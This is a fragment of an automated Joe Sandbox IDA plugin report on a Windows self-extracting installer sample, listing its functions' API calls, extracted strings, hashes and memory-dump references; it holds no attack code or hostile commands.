                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                • String ID:
                                                                • API String ID: 2586545124-0
                                                                • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                                                • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                                                • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                                                • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                                                • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                                                • GetDlgItem.USER32(?,?), ref: 004067CC
                                                                • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                                                • GetDlgItem.USER32(?,?), ref: 004067DD
                                                                • SetFocus.USER32(00000000,?,000004B4,76B10E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ItemMessageSend$Focus
                                                                • String ID:
                                                                • API String ID: 3946207451-0
                                                                • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                                                • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                                                • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: IA$IA$IA$IA$IA$IA
                                                                • API String ID: 613200358-3743982587
                                                                • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                • API String ID: 613200358-994561823
                                                                • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                APIs
                                                                • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                • GetDC.USER32(00000000), ref: 00406DFB
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                • String ID:
                                                                • API String ID: 2693764856-0
                                                                • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                APIs
                                                                • GetDC.USER32(?), ref: 0040696E
                                                                • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                • SelectObject.GDI32(?,?), ref: 004069B8
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                • SelectObject.GDI32(?,?), ref: 004069F9
                                                                • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                • String ID:
                                                                • API String ID: 2466489532-0
                                                                • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                APIs
                                                                • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,76B0E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$CharUpper$lstrlen
                                                                • String ID: hAA
                                                                • API String ID: 2587799592-1362906312
                                                                • Opcode ID: b8720cb8756f8e9e8094298d34df6b31f2892d9def23642e2fc1977912460d31
                                                                • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                • Opcode Fuzzy Hash: b8720cb8756f8e9e8094298d34df6b31f2892d9def23642e2fc1977912460d31
                                                                • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                  • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                  • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                  • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                  • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 4038993085-2279431206
                                                                • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                APIs
                                                                • EndDialog.USER32(?,00000000), ref: 00407579
                                                                • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                • SuspendThread.KERNEL32(0000026C), ref: 004075CD
                                                                • ResumeThread.KERNEL32(0000026C), ref: 004075EA
                                                                • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: DialogThreadTimer$KillResumeSuspend
                                                                • String ID:
                                                                • API String ID: 4151135813-0
                                                                • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                  • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000025,004177C4,004177C4,00000000,00000025,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                • wsprintfA.USER32 ref: 00404EBC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$wsprintf
                                                                • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                • API String ID: 2704270482-1550708412
                                                                • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%T/$%%T\
                                                                • API String ID: 613200358-2679640699
                                                                • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%S/$%%S\
                                                                • API String ID: 613200358-358529586
                                                                • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                APIs
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@
                                                                • String ID: %%M/$%%M\
                                                                • API String ID: 613200358-4143866494
                                                                • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                • API String ID: 432778473-803145960
                                                                • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                APIs
                                                                  • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@$??3@$memmove
                                                                • String ID: IA$IA$IA
                                                                • API String ID: 4294387087-924693538
                                                                • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                APIs
                                                                • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                • wsprintfW.USER32 ref: 00407BBB
                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@ItemMessageSendwsprintf
                                                                • String ID: %d%%
                                                                • API String ID: 3767627759-1518462796
                                                                • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                APIs
